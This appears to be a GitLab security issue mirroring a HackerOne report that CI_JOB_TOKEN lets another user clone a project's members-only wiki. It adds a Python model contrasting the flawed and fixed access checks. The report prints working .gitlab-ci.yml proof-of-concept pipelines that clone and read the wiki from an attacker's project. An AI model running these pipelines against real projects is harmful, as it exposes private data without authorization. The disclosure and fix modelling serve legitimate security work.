Backend: Able to git the wiki despite the Only Project Members setting
**[HackerOne report #1075586](https://hackerone.com/reports/1075586)** by `shells3c` on 2021-01-10, assigned to @rchan-gitlab:
[Report](#report) | [How To Reproduce](#how-to-reproduce)
## Report
##### Summary
There was a mistake while confirming the patch for the Wiki bug in the past report #887755, and the fact is that the bug is still there! I am able to git a private wiki using the `CI_JOB_TOKEN` (public project).
##### Steps to reproduce
1. Create a project, set the **Wiki visibility** to **Only Project Members** in the setting page: `https://gitlab.com/<user>/<project>/edit`
2. Log in as another user (attacker) and create a **.gitlab-ci.yml** in an arbitrary project:
```yml
stages:
  - steal
test:
  stage: steal
  script:
    - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/company/api.wiki.git'
    - 'cd api.wiki && cat api-doc.md'
```
3. In the pipeline output, you will be able to read the content.
##### Examples
- Can't access this: https://gitlab.com/just4hack2/mypro/-/wikis/home
- Try adding the following in your **.gitlab-ci.yml** and read the wiki:
```yml
stages:
  - steal
test:
  stage: steal
  script:
    - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/just4hack2/mypro.wiki.git'
    # the clone above creates a directory named after the wiki repo, i.e. mypro.wiki
    - 'cd mypro.wiki'
    - 'ls'
    - 'cat home.md'
```
#### Impact
Able to read the private Wiki of GitLab projects.
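The authorization gap the report describes is that a `CI_JOB_TOKEN` was checked against the *project* visibility (public) rather than the *wiki* visibility (Only Project Members). Below is an added, hypothetical model of that decision, written for this page rather than taken from GitLab's code base: `can_read_wiki_flawed` reproduces the reported behaviour, `can_read_wiki_fixed` scopes the job token to the project it was issued for and then applies the wiki setting to the token's user. `Project`, `JobToken`, `WikiAccess` and the constructed sample data are assumptions of the example.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional, Set, Union


class WikiAccess(Enum):
    DISABLED = "disabled"
    MEMBERS_ONLY = "members_only"   # "Only Project Members" in the project settings
    EVERYONE = "everyone"


@dataclass
class Project:
    path: str
    public: bool                    # project visibility, distinct from wiki visibility
    wiki_access: WikiAccess
    members: Set[str] = field(default_factory=set)


@dataclass
class JobToken:
    # Hypothetical model of CI_JOB_TOKEN: issued to a pipeline of `source_project`,
    # running on behalf of `user`.
    user: str
    source_project: str


Actor = Union[None, str, JobToken]  # None = anonymous, str = username


def wiki_readable_by_user(project: Project, user: Optional[str]) -> bool:
    """Wiki feature check for a plain user (None = anonymous)."""
    if project.wiki_access is WikiAccess.DISABLED:
        return False
    if project.wiki_access is WikiAccess.EVERYONE:
        return project.public or user in project.members
    return user in project.members          # MEMBERS_ONLY


def can_read_wiki_flawed(project: Project, actor: Actor) -> bool:
    """Models the reported behaviour: a job token is accepted against the
    project visibility alone, so the wiki setting is never consulted."""
    if isinstance(actor, JobToken):
        return project.public
    return wiki_readable_by_user(project, actor)


def can_read_wiki_fixed(project: Project, actor: Actor) -> bool:
    """Hardened check: a job token only reaches the project that issued it,
    and the wiki-specific visibility is then applied to the token's user."""
    if isinstance(actor, JobToken):
        if actor.source_project != project.path:
            return False
        actor = actor.user
    return wiki_readable_by_user(project, actor)
```

A regression test for the fix is the pair of calls with a token from an unrelated project against a public project whose wiki is members-only: the flawed check grants access, the fixed one denies it.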
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues